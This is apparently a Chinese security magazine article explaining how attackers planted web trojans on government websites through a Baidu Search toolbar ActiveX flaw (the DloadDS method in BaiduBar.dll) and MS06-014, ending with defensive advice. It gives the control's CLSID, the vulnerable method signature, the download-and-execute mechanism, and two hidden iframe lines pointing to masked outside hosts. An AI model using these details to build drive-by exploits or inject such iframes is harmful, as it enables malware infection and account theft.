百度搜索栏 沦为挂马先锋
安全阵线
近日,一些GOV网站被黑客攻击(图1),纷纷沦陷。但是,这一轮黑客攻击似乎与以往的黑客攻击有很大的区别。在以往的黑客攻击中,黑客在入侵GOV网站之后,通常会修改某一特定页面,加注上炫耀性的图片或者文字标明自己入侵成功。
在这一轮GOV网站被攻击的浪潮中,黑客不再以入侵网站为目的,他们采取危害性更大的动作——挂马。在我们仔细对这一时间几十家被挂马的GOV网站进行分析后,发现了一个惊人的秘密,所有遭到黑客入侵的GOV网站,竟然所挂的都是相同的两款网页木马,而其中一款网页木马是在网络中完全找不到现成生成工具。
无人修复的漏洞
这群目标直指GOV网站的黑客究竟在网站中使用了什么样的神秘溢出挂马手段呢?答案是Baidu Search Assist ActiveX Exploit和MS06-014 Exploit。MS06-014 Exploit几乎不值一提,它是2006年微软的一个老漏洞,该漏洞的各种生成工具已经在网络中流传甚广,对于大多数修补了补丁的用户而言,威胁不大。
可是,这个名为“Baidu Search Assist ActiveX Exploit”的漏洞则完全不同,它出现在百度搜索工具栏中(图2),这款软件的前身也叫百度搜霸。它是一款免费的浏览器辅助工具,以ActiveX控件的形式直接安装在IE浏览器中,很多用户的浏览器中都有它的存在。
Baidu Search Assist ActiveX Exploit漏洞,在一年多前就被挖掘出来了,不过当时仅有一家网站轻描淡写地公布了漏洞信息,关注度非常低,而且网上没有任何相关的漏洞生成器。该漏洞的技术细节只在小圈子里面流传。由于知道该漏洞的人少,再加上编写攻击代码的难度较高,之前一直没有该漏洞挂马的成功案例。
虽然该漏洞不算新了,但危害依然很大。为什么这样说呢?百度搜索工具栏的用户相当广泛,特别是近几年通过软件附带安装和网站推广等手段,许多用户的浏览器中都安装了这款ActiveX控件。另外,这款ActiveX控件无法实现自动升级,必须通过再次安装新版本才能够实现升级,这意味着一年多前安装了百度搜索工具栏的用户们都可能成为这种攻击手段的受害者。
除此之外,许多用户往往并不能够分辨出哪些ActiveX控件是无害的,哪些ActiveX控件是有害的,黑客会利用用户对百度的信任,通过欺诈让用户先安装上老版本的百度工具栏(2.0版之前的都受到影响),然后再实施攻击。
漏洞为什么会产生
漏洞为什么会产生呢?我们经过多次实验,发现漏洞存在于“BaiduBar.dll”文件的“DloadDS()”函数中:
InprocServer32: C:\Program Files\baidu\bar\BaiduBar.dll
ClassID : A7F05EE4-0426-454F-8013-C41E3596E9E9
[id(0x0000001d), helpstring("method DloadDS")]
void DloadDS(
[in] BSTR bstrUrl,
[in] BSTR bstrName,
[in] long lShow);
由于程序员没有进行安全检查,导致了黑客如果把其中的bstrUrl参数设置成黑客服务器上的CAB木马文件,那么DloadDS()函数会照样尝试下载这个文件到TEMP目录并解压,然后执行其中以“bstrName”命名的文件。关键代码如图3所示。
此时lpCommandLine指向“C:\DOCUME~1\administrator\LOCALS~1\Temp\calc.exe”,由于之前没有采取任何有效的检查措施,因此攻击者可构造包含木马或者间谍程序的CAB文件,然后用DloadDS()函数下载并运行它。
挂马如此简单
挂马集团首先会将恶意代码输入写字板中,然后另存为HTML文件。再在挂马网页中写入嵌入代码,将含毒网页嵌入被入侵的网站中:
<iframe src=http://www.hb****.cn/b4.htm width=50 height=0 border=0></iframe>
<Iframe src="http://jz****.cn/fxx.htm" width=100 height=0></iframe>
这些嵌入的网页都包含有百度搜索工具栏漏洞的ActiveX控件代码(图4)。做完这个工作,再上传打包CAB木马,挂马集团就可以静静在千里之外的某个地点,等待用户点击这些网页了。用户一旦点击了网页,就会激活漏洞,引来病毒,用户的电脑就成为“肉鸡”,各种账号和密码都有可能被盗。
防范技巧
要防范该漏洞比较简单,用户先检查一下自己的IE浏览器地址栏是否有百度搜索工具栏,如果有的话,最好去百度官方网站,下载最新版本重新安装。除此之外,还可以安装一些具有网页木马拦截能力的安全辅助工具。